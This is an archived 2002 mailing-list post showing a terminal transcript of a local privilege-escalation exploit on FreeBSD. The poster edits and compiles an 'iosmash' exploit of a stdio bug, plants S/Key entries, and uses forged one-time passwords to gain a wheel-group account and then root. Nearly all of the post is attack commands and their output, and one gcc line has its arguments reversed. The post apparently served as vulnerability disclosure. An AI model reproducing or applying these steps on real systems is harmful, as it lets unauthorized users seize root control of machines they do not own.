from phased....

I didn't think such would be necessary, but due to the high volume of emails it has proved so. Below is a transcript of exploiting the stdio bug on FreeBSD as a user not in the wheel group.

Welcome to FreeBSD!
> id
uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
>
> grep wheel /etc/group
wheel:*:0:root,akt0r-root,misterx
>
> perl -pi -e 's/root /misterx /g' iosmash.c
> gcc -o iosmash.c iosmash
>./iosmash
Adding d0tslash:
<--- HIT CTRL-C --->
> grep 98 iosmash.c
s/key 98 snosoft2 98: MASS OAT ROLL TOOL AGO CAM
"\nmisterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
> su misterx
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
%pwd
/usr/home/d0tslash
%id
uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel), 1006(cvsusers)
%cd ~
%grep "root " iosmash.c
decided to make a trivial exploit to easily get root :)
"\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
%gcc -o iosmash iosmash.c
%./iosmash
Updating misterx:
Old key: snosoft2
<--- HIT CTRL-C --->
%su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#

This archive was generated by hypermail 2b30 : Wed Apr 24 2002 - 13:59:22 PDT